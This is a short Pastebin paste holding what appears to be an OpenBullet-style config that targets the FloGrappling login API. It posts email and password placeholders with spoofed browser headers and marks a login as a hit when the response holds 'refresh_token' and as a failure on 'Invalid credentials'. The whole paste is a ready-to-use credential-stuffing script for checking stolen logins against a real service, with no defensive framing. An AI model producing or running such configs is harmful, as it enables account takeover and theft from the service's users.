Advertisement
Guest User

Untitled

a guest
Feb 18th, 2020
177
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.89 KB | None | 0 0
  1. REQUEST POST "https://api.flograppling.com/api/tokens"
  2. CONTENT "{\"email\":\"<USER>\",\"password\":\"<PASS>\"}"
  3. CONTENTTYPE "application/json"
  4. HEADER ": path: /api/tokens"
  5. HEADER "content-length: 47"
  6. HEADER "accept: application/json, text/plain, */*"
  7. HEADER "dnt: 1"
  8. HEADER "x-flo-flags-all: flo_10402_cloudsearch_metadata_v2-0"
  9. HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
  10. HEADER "content-type: application/json"
  11. HEADER "origin: https://www.flograppling.com"
  12. HEADER "sec-fetch-site: same-site"
  13. HEADER "sec-fetch-mode: cors"
  14. HEADER "referer: https://www.flograppling.com/login"
  15. HEADER "accept-encoding: gzip, deflate, br"
  16.  
  17. KEYCHECK BanOnToCheck=FALSE
  18. KEYCHAIN Success OR
  19. KEY "refresh_token"
  20. KEYCHAIN Failure OR
  21. KEY "Invalid credentials"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement